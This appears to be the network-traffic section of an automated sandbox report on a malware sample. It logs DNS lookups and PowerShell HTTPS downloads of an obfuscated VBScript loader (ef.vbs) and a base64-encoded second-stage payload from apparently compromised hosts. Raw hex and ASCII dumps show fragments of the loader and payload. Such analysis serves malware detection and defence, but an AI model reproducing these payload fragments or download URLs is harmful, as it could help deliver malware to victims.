                                                                                                                                                Dec 18, 2024 19:27:28.730355978 CET6146053192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:28.866189957 CET53586091.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:28.874109030 CET53592501.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:28.966201067 CET53614601.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:29.387053013 CET53504541.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:29.476835966 CET53581131.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:29.760526896 CET5169753192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:29.760526896 CET5250653192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:29.791929007 CET53516971.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:29.898135900 CET53516971.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:30.753963947 CET5250653192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:30.851954937 CET53525061.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:30.851969004 CET53525061.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:30.853007078 CET51022123192.168.2.4193.171.23.163
                                                                                                                                                Dec 18, 2024 19:27:30.853072882 CET51022123192.168.2.4129.6.15.28
                                                                                                                                                Dec 18, 2024 19:27:30.853102922 CET51022123192.168.2.4169.229.128.134
                                                                                                                                                Dec 18, 2024 19:27:30.853137970 CET51022123192.168.2.4194.58.203.20
                                                                                                                                                Dec 18, 2024 19:27:30.853179932 CET51022123192.168.2.4133.243.238.163
                                                                                                                                                Dec 18, 2024 19:27:30.853214025 CET51022123192.168.2.4129.250.35.250
                                                                                                                                                Dec 18, 2024 19:27:30.853266954 CET51022123192.168.2.4213.239.239.164
                                                                                                                                                Dec 18, 2024 19:27:30.891731024 CET53525061.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:32.019906998 CET12351022129.250.35.250192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:32.027496099 CET12351022129.6.15.28192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:32.096389055 CET12351022169.229.128.134192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:32.106080055 CET12351022194.58.203.20192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:32.107527018 CET12351022213.239.239.164192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:32.109821081 CET12351022193.171.23.163192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:32.149456024 CET12351022133.243.238.163192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:39.573673010 CET53581691.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:39.729980946 CET53610151.1.1.1192.168.2.4

                                                                                                                                                ICMP Packets

                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                Dec 18, 2024 19:27:29.899467945 CET192.168.2.41.1.1.1c1fb(Port unreachable)Destination Unreachable
                                                                                                                                                Dec 18, 2024 19:27:30.891788960 CET192.168.2.41.1.1.1c1f1(Port unreachable)Destination Unreachable

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Dec 18, 2024 19:26:08.623895884 CET192.168.2.41.1.1.10xab2aStandard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:09.628732920 CET192.168.2.41.1.1.10xab2aStandard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:18.781996012 CET192.168.2.41.1.1.10xda0bStandard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:19.769424915 CET192.168.2.41.1.1.10xda0bStandard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:35.739362001 CET192.168.2.41.1.1.10x65fcStandard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.728341103 CET192.168.2.41.1.1.10x335dStandard query (0)ts1.aco.netA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.728527069 CET192.168.2.41.1.1.10x95faStandard query (0)gbg1.ntp.seA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.728739023 CET192.168.2.41.1.1.10xd846Standard query (0)time-a-g.nist.govA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.728909016 CET192.168.2.41.1.1.10xd544Standard query (0)ntp.nict.jpA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.729322910 CET192.168.2.41.1.1.10x8155Standard query (0)ntp1.net.berkeley.eduA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.729993105 CET192.168.2.41.1.1.10x8065Standard query (0)x.ns.gin.ntt.netA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.730355978 CET192.168.2.41.1.1.10xfa7fStandard query (0)ntp1.hetzner.deA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:29.760526896 CET192.168.2.41.1.1.10x8155Standard query (0)ntp1.net.berkeley.eduA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:29.760526896 CET192.168.2.41.1.1.10x335dStandard query (0)ts1.aco.netA (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:30.753963947 CET192.168.2.41.1.1.10x335dStandard query (0)ts1.aco.netA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Dec 18, 2024 19:26:09.988111019 CET1.1.1.1192.168.2.40xab2aNo error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:09.988111019 CET1.1.1.1192.168.2.40xab2aNo error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:09.988130093 CET1.1.1.1192.168.2.40xab2aNo error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:09.988130093 CET1.1.1.1192.168.2.40xab2aNo error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:20.507648945 CET1.1.1.1192.168.2.40xda0bNo error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:20.507648945 CET1.1.1.1192.168.2.40xda0bNo error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:20.507929087 CET1.1.1.1192.168.2.40xda0bNo error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:20.507929087 CET1.1.1.1192.168.2.40xda0bNo error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:36.257674932 CET1.1.1.1192.168.2.40x65fcNo error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:36.257674932 CET1.1.1.1192.168.2.40x65fcNo error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:26:57.479424953 CET1.1.1.1192.168.2.40xdb1eNo error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.866189957 CET1.1.1.1192.168.2.40xd544No error (0)ntp.nict.jp133.243.238.163A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.866189957 CET1.1.1.1192.168.2.40xd544No error (0)ntp.nict.jp133.243.238.244A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.866189957 CET1.1.1.1192.168.2.40xd544No error (0)ntp.nict.jp61.205.120.130A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.866189957 CET1.1.1.1192.168.2.40xd544No error (0)ntp.nict.jp133.243.238.164A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.866189957 CET1.1.1.1192.168.2.40xd544No error (0)ntp.nict.jp133.243.238.243A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.874109030 CET1.1.1.1192.168.2.40xd846No error (0)time-a-g.nist.gov129.6.15.28A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:28.966201067 CET1.1.1.1192.168.2.40xfa7fNo error (0)ntp1.hetzner.de213.239.239.164A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:29.387053013 CET1.1.1.1192.168.2.40x8065No error (0)x.ns.gin.ntt.net129.250.35.250A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:29.476835966 CET1.1.1.1192.168.2.40x95faNo error (0)gbg1.ntp.segbg1.ntp.netnod.seCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:29.476835966 CET1.1.1.1192.168.2.40x95faNo error (0)gbg1.ntp.netnod.se194.58.203.20A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:29.791929007 CET1.1.1.1192.168.2.40x8155No error (0)ntp1.net.berkeley.edu169.229.128.134A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:29.898135900 CET1.1.1.1192.168.2.40x8155No error (0)ntp1.net.berkeley.edu169.229.128.134A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:30.851954937 CET1.1.1.1192.168.2.40x335dNo error (0)ts1.aco.net193.171.23.163A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:30.851969004 CET1.1.1.1192.168.2.40x335dNo error (0)ts1.aco.net193.171.23.163A (IP address)IN (0x0001)false
                                                                                                                                                Dec 18, 2024 19:27:30.891731024 CET1.1.1.1192.168.2.40x335dNo error (0)ts1.aco.net193.171.23.163A (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • www.astenterprises.com.pk
                                                                                                                                                • www.tdejb.com
                                                                                                                                                • www.fornid.com

                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449730107.161.23.1504436904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-18 18:26:11 UTC179OUTGET /ef/ef.vbs HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                Host: www.astenterprises.com.pk
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-18 18:26:11 UTC392INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                content-type: text/vbscript
                                                                                                                                                last-modified: Wed, 18 Dec 2024 06:06:20 GMT
                                                                                                                                                accept-ranges: bytes
                                                                                                                                                content-length: 28001
                                                                                                                                                date: Wed, 18 Dec 2024 18:26:11 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                2024-12-18 18:26:11 UTC976INData Raw: 0d 0a 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4b 69 6c 6f 65 6e 65 73 20 3d 20 26 48 32 33 36 34 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 72 6f 67 72 61 6d 64 69 73 6b 65 6e 73 20 3d 20 26 48 46 46 46 46 33 43 30 43 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 65 6c 69 61 6e 63 65 73 20 3d 20 2d 31 30 36 37 36 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 6f 6f 64 6c 65 20 3d 20 22 4e 6f 6e 73 79 6e 63 6f 70 61 74 69 6f 6e 3b 20 66 6c 69 62 62 65 72 74 69 67 69 62 62 65 74 2e 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6e 69 74 73 61 61 72 20 3d 20 22 46 61 72 6d 65 72 6e 65 20 73 61 6d 6d 65 6e 73 79 6e 69 6e 67 65 6e 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 55 6e 73 75 70 65 72 76 69 73 65 64 20 3d 20
                                                                                                                                                Data Ascii: Private Const Kiloenes = &H2364Private Const Programdiskens = &HFFFF3C0CPrivate Const Reliances = -10676Private Const Roodle = "Nonsyncopation; flibbertigibbet."Private Const Snitsaar = "Farmerne sammensyningens"Private Const Unsupervised =
                                                                                                                                                2024-12-18 18:26:11 UTC14994INData Raw: 6f 72 64 72 64 6e 69 6e 67 65 6e 22 0d 0a 27 42 6c 64 73 64 65 6e 68 65 64 65 6e 73 2c 20 73 6a 61 65 6c 20 64 72 69 7a 7a 6c 65 21 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 3d 27 41 66 68 6e 64 65 64 65 27 3b 3b 24 6e 6f 6e 63 6f 6f 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 70 65 72 61 77 6f 72 64 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 6f 72 3d 27 43 72 79 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 6f 70 68 6f 72 75 73 27 3b 3b 24 54 68 61 6c 61 73 73 69 6e 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20
                                                                                                                                                Data Ascii: ordrdningen"'Bldsdenhedens, sjael drizzle!Rattletraps = Rattletraps & "='Afhndede';;$noncoo"Rattletraps = Rattletraps & "peraword"Rattletraps = Rattletraps & "or='Cry"Rattletraps = Rattletraps & "ophorus';;$Thalassin"Rattletraps = Rattletraps
                                                                                                                                                2024-12-18 18:26:11 UTC12031INData Raw: 6c 65 74 72 61 70 73 20 26 20 22 64 61 62 65 6c 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 6c 65 72 20 27 42 6a 53 20 69 54 54 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 61 41 73 75 72 77 6f 72 64 78 77 6f 72 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 64 20 2e 20 63 69 77 6f 72 64 54 20 2d 53 77 6f 72 64 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 53 45 20 4c 20 20 45 6f 76 45 2e 22 0d 0a 52 61 74 74 6c 65 74 72 61 70 73 20 3d 20 52 61 74 74 6c 65 74 72 61 70 73 20 26 20 22 6f 50 2c 6f 20 53 65 34 27 29 3b 63 6c 65 61 76 69 6e 67 6c 79 20 28 53 22
                                                                                                                                                Data Ascii: letraps & "dabel"Rattletraps = Rattletraps & "ler 'BjS iTT"Rattletraps = Rattletraps & "aAsurwordxwor"Rattletraps = Rattletraps & "d . ciwordT -Sword"Rattletraps = Rattletraps & "SE L EovE."Rattletraps = Rattletraps & "oP,o Se4');cleavingly (S"


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449732202.71.109.2284436216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-18 18:26:22 UTC173OUTGET /ef/Skifterne.sea HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                Host: www.tdejb.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-18 18:26:23 UTC183INHTTP/1.1 200 OK
                                                                                                                                                Date: Wed, 18 Dec 2024 18:26:21 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Last-Modified: Wed, 18 Dec 2024 05:46:30 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 460840
                                                                                                                                                Connection: close
                                                                                                                                                2024-12-18 18:26:23 UTC8009INData Raw: 36 77 4b 5a 4f 75 73 43 73 54 71 37 34 37 55 58 41 4f 73 43 52 76 6c 78 41 5a 73 44 58 43 51 45 63 51 47 62 36 77 4b 41 4d 4c 6e 68 6e 45 72 44 63 51 47 62 36 77 4a 6e 50 59 48 70 46 66 43 58 71 33 45 42 6d 2b 73 43 74 54 79 42 77 54 52 54 54 65 6a 72 41 6f 30 72 36 77 49 7a 55 75 73 43 37 79 74 78 41 5a 75 36 45 44 4c 42 49 75 73 43 5a 67 76 72 41 73 6e 59 63 51 47 62 36 77 49 77 34 44 48 4b 36 77 49 49 6c 58 45 42 6d 34 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 63 51 47 62 36 77 4b 36 4e 49 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 33 54 79 47 42 48 7a 4e 63 51 47 62 63 51 47 62 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 63 51 47 62 36 77 49 52 32 59 48 44 62 76 31 51 41 33 45 42 6d 33 45 42 6d 37 71 73 30 65 6d 6a 36 77 4b 36 70 48 45 42 6d 34 48
                                                                                                                                                Data Ascii: 6wKZOusCsTq747UXAOsCRvlxAZsDXCQEcQGb6wKAMLnhnErDcQGb6wJnPYHpFfCXq3EBm+sCtTyBwTRTTejrAo0r6wIzUusC7ytxAZu6EDLBIusCZgvrAsnYcQGb6wIw4DHK6wIIlXEBm4kUC3EBm3EBm9HicQGb6wK6NIPBBHEBm3EBm4H53TyGBHzNcQGbcQGbi0QkBHEBm3EBm4nDcQGb6wIR2YHDbv1QA3EBm3EBm7qs0emj6wK6pHEBm4H
                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 43 71 57 56 71 4f 76 72 48 6b 58 46 63 56 52 7a 54 49 44 46 48 42 46 39 78 34 4e 4f 65 41 52 32 35 7a 76 6c 56 55 42 4e 63 77 34 48 46 64 54 38 47 68 57 4d 65 4d 76 63 68 54 38 66 33 61 68 70 37 67 65 36 49 54 43 71 78 54 38 64 2b 6c 46 33 62 67 65 52 50 51 77 54 4d 4b 52 73 41 69 55 41 71 52 71 52 33 67 59 64 62 74 61 71 6b 70 36 79 45 31 38 48 4c 36 6e 2f 43 7a 74 44 6d 50 33 58 54 30 43 52 74 6b 75 6c 69 62 6d 36 30 31 71 2f 6d 76 63 35 4b 4a 55 61 70 70 36 6b 6c 49 41 34 4c 77 75 79 76 72 34 30 61 36 35 4b 4c 62 45 74 49 71 59 2b 56 79 34 48 75 77 71 38 4e 55 55 7a 41 39 66 7a 35 6c 72 63 78 7a 76 4f 4f 55 49 61 37 77 70 34 69 33 4d 33 59 6e 66 73 79 39 7a 36 65 75 34 7a 4a 6d 50 64 35 63 2f 66 34 33 74 73 4e 2b 6e 4e 6b 6d 30 71 50 73 46 6a 6a 4b 44
                                                                                                                                                Data Ascii: CqWVqOvrHkXFcVRzTIDFHBF9x4NOeAR25zvlVUBNcw4HFdT8GhWMeMvchT8f3ahp7ge6ITCqxT8d+lF3bgeRPQwTMKRsAiUAqRqR3gYdbtaqkp6yE18HL6n/CztDmP3XT0CRtkulibm601q/mvc5KJUapp6klIA4Lwuyvr40a65KLbEtIqY+Vy4Huwq8NUUzA9fz5lrcxzvOOUIa7wp4i3M3Ynfsy9z6eu4zJmPd5c/f43tsN+nNkm0qPsFjjKD
                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 47 4d 43 64 76 38 33 35 61 72 54 4d 42 30 41 43 65 76 69 48 6c 56 70 56 33 43 51 36 74 71 67 34 52 79 76 38 51 68 68 37 76 59 64 46 4f 73 58 4c 6a 58 43 48 5a 37 72 75 68 77 31 42 34 69 2f 2b 62 46 70 50 47 46 71 4a 4b 37 50 34 74 74 6a 56 6e 6d 32 69 58 56 68 42 36 66 32 78 68 41 65 51 52 33 6e 48 67 77 32 4b 4b 73 47 4f 65 2b 56 44 54 6e 76 6c 51 30 35 37 35 55 4e 4f 65 2b 56 63 44 41 6c 72 32 31 69 72 73 34 49 59 42 59 4c 32 63 31 49 50 2b 70 4e 67 30 79 35 6c 66 38 68 46 31 7a 52 48 6b 50 75 6b 64 57 45 4f 46 65 38 50 62 53 46 78 62 55 51 4f 6c 34 4e 44 50 2b 31 34 48 76 61 4f 5a 6a 52 6d 61 44 37 70 69 47 68 68 43 6d 6c 4c 44 6f 50 59 63 44 43 41 79 66 75 69 76 35 43 48 7a 6d 31 49 4d 58 4e 66 6b 75 71 4c 35 49 4c 36 51 35 34 38 38 30 34 55 39 35 32
                                                                                                                                                Data Ascii: GMCdv835arTMB0ACeviHlVpV3CQ6tqg4Ryv8Qhh7vYdFOsXLjXCHZ7ruhw1B4i/+bFpPGFqJK7P4ttjVnm2iXVhB6f2xhAeQR3nHgw2KKsGOe+VDTnvlQ0575UNOe+VcDAlr21irs4IYBYL2c1IP+pNg0y5lf8hF1zRHkPukdWEOFe8PbSFxbUQOl4NDP+14HvaOZjRmaD7piGhhCmlLDoPYcDCAyfuiv5CHzm1IMXNfkuqL5IL6Q548804U952
                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 41 78 43 66 79 42 5a 6d 31 4c 65 49 62 62 66 49 47 4a 75 59 67 4d 78 71 2b 31 63 67 48 6a 6d 31 78 6c 75 5a 45 68 42 43 63 57 4d 79 4d 63 32 4d 55 6c 6d 6e 44 65 39 5a 67 50 47 2f 78 50 4e 32 39 61 67 39 4d 5a 50 72 65 43 47 57 76 55 4e 64 51 34 64 55 45 41 63 75 30 79 73 45 58 35 74 30 44 58 41 77 55 51 67 49 72 7a 76 61 62 59 55 2b 74 52 6d 79 55 36 34 4b 43 47 7a 45 79 33 43 57 34 64 72 78 62 42 30 62 6d 4d 45 4a 6e 50 65 6a 4d 38 49 51 78 2f 45 62 6d 50 45 30 5a 73 44 6a 4d 39 45 52 6b 70 55 5a 71 4d 34 42 64 64 59 61 66 67 48 4e 58 4d 66 34 54 7a 58 31 59 6d 39 35 45 59 70 42 32 77 35 5a 59 79 63 36 62 36 61 61 4a 7a 35 56 42 69 6f 6a 33 67 78 66 32 65 6a 56 69 73 43 30 7a 79 6c 73 52 36 77 48 65 32 56 44 62 4b 71 74 51 67 35 37 35 51 4e 73 48 4a 43
                                                                                                                                                Data Ascii: AxCfyBZm1LeIbbfIGJuYgMxq+1cgHjm1xluZEhBCcWMyMc2MUlmnDe9ZgPG/xPN29ag9MZPreCGWvUNdQ4dUEAcu0ysEX5t0DXAwUQgIrzvabYU+tRmyU64KCGzEy3CW4drxbB0bmMEJnPejM8IQx/EbmPE0ZsDjM9ERkpUZqM4BddYafgHNXMf4TzX1Ym95EYpB2w5ZYyc6b6aaJz5VBioj3gxf2ejVisC0zylsR6wHe2VDbKqtQg575QNsHJC
                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 4c 34 59 65 6f 64 4e 76 63 67 2f 55 73 48 55 70 76 61 36 78 33 2b 30 4c 68 4f 6e 6b 64 36 76 59 32 4a 75 6b 75 31 5a 66 32 4a 61 68 6d 4b 73 4a 7a 4a 75 59 74 51 52 39 73 65 4d 2f 71 78 50 66 63 52 75 65 70 72 54 54 4d 4e 63 70 57 5a 30 42 41 42 79 38 7a 54 69 6b 70 38 4a 63 49 44 4a 79 46 35 55 66 54 41 74 44 39 35 61 62 70 49 57 64 57 70 52 77 41 66 41 33 4e 45 52 63 49 6b 51 78 57 42 71 58 46 4b 34 32 42 53 55 7a 70 2f 46 74 5a 49 45 6d 59 4d 38 47 57 78 30 4d 4e 6f 43 37 35 2b 62 6f 4f 79 4f 6b 39 49 49 45 4c 38 32 56 6d 39 7a 48 4f 73 34 36 51 69 49 34 70 65 33 6b 57 34 50 6e 61 43 56 61 51 73 4d 79 4e 65 74 43 76 33 68 6f 49 35 66 61 52 6e 53 57 50 42 5a 37 66 6c 37 74 79 61 32 68 64 5a 52 54 63 70 49 37 32 38 4b 72 63 5a 6e 31 32 42 56 75 4e 69 36
                                                                                                                                                Data Ascii: L4YeodNvcg/UsHUpva6x3+0LhOnkd6vY2Juku1Zf2JahmKsJzJuYtQR9seM/qxPfcRueprTTMNcpWZ0BABy8zTikp8JcIDJyF5UfTAtD95abpIWdWpRwAfA3NERcIkQxWBqXFK42BSUzp/FtZIEmYM8GWx0MNoC75+boOyOk9IIEL82Vm9zHOs46QiI4pe3kW4PnaCVaQsMyNetCv3hoI5faRnSWPBZ7fl7tya2hdZRTcpI728KrcZn12BVuNi6
                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 7a 35 64 47 63 6a 4f 73 4b 7a 42 78 6a 41 79 30 2b 67 48 50 42 6c 41 43 4a 2b 2b 5a 6a 44 62 78 62 67 63 54 4f 6b 44 76 6c 6c 37 47 51 4a 6f 58 2f 64 2f 54 56 4d 46 41 46 77 34 51 33 61 6b 51 49 65 4a 31 59 59 59 63 37 56 46 39 35 68 4a 53 48 32 39 6b 38 42 61 78 6a 45 57 38 43 57 4a 41 6a 67 63 42 67 30 35 37 35 55 4e 4f 65 2b 56 44 54 6e 76 6c 51 30 35 37 2f 56 33 4c 37 59 32 69 69 45 35 68 46 41 6e 70 43 74 52 6e 76 4d 30 2f 77 61 6f 6d 66 63 32 74 6b 74 6a 35 50 37 47 68 71 51 79 6c 41 30 35 34 4a 51 2f 76 65 2b 56 44 54 6e 76 6c 51 30 35 37 35 55 4e 4f 65 2b 56 44 55 4b 32 71 78 35 4d 6d 2b 55 56 4b 53 6e 79 36 65 66 73 71 45 4f 41 46 62 41 36 6e 53 37 74 32 36 54 6d 6e 6c 63 74 68 64 79 41 74 72 30 76 44 58 44 50 64 49 7a 4c 69 4e 6e 56 6b 57 35 6e
                                                                                                                                                Data Ascii: z5dGcjOsKzBxjAy0+gHPBlACJ++ZjDbxbgcTOkDvll7GQJoX/d/TVMFAFw4Q3akQIeJ1YYYc7VF95hJSH29k8BaxjEW8CWJAjgcBg0575UNOe+VDTnvlQ057/V3L7Y2iiE5hFAnpCtRnvM0/waomfc2tktj5P7GhqQylA054JQ/ve+VDTnvlQ0575UNOe+VDUK2qx5Mm+UVKSny6efsqEOAFbA6nS7t26TmnlcthdyAtr0vDXDPdIzLiNnVkW5n
                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 56 4a 38 72 67 79 35 47 70 73 32 57 72 6f 45 5a 71 48 58 35 59 70 69 62 6d 4c 41 55 76 32 78 58 34 50 7a 58 36 72 67 62 6d 64 6f 48 6e 6b 6d 6a 4e 4f 6b 30 44 46 58 62 6d 66 5a 69 38 6e 4e 6a 4d 74 73 42 39 36 61 5a 71 64 32 55 71 38 77 6f 69 47 4c 34 71 38 6b 52 36 55 73 7a 36 76 51 4b 32 39 71 6d 52 6b 57 72 38 39 72 4e 69 69 6a 44 54 6e 76 6c 51 30 35 37 35 55 4e 4f 65 2b 56 44 54 6e 76 39 6f 48 4f 64 74 69 32 30 4d 71 6e 2f 75 65 44 39 65 51 38 6f 75 7a 4a 67 6f 67 4e 58 78 79 54 2f 51 7a 42 5a 43 69 2b 4f 4f 2b 56 68 4b 77 48 6c 41 30 35 5a 6c 64 66 73 6e 70 39 44 44 6e 76 78 4c 52 54 58 61 6e 6b 75 42 35 74 36 4f 64 39 46 4f 53 47 63 6b 4a 59 75 42 36 62 33 32 68 4c 46 50 7a 77 2f 73 36 50 73 4f 62 56 43 46 45 2b 69 67 64 53 58 4f 71 44 77 69 58 61
                                                                                                                                                Data Ascii: VJ8rgy5Gps2WroEZqHX5YpibmLAUv2xX4PzX6rgbmdoHnkmjNOk0DFXbmfZi8nNjMtsB96aZqd2Uq8woiGL4q8kR6Usz6vQK29qmRkWr89rNiijDTnvlQ0575UNOe+VDTnv9oHOdti20Mqn/ueD9eQ8ouzJgogNXxyT/QzBZCi+OO+VhKwHlA05Zldfsnp9DDnvxLRTXankuB5t6Od9FOSGckJYuB6b32hLFPzw/s6PsObVCFE+igdSXOqDwiXa
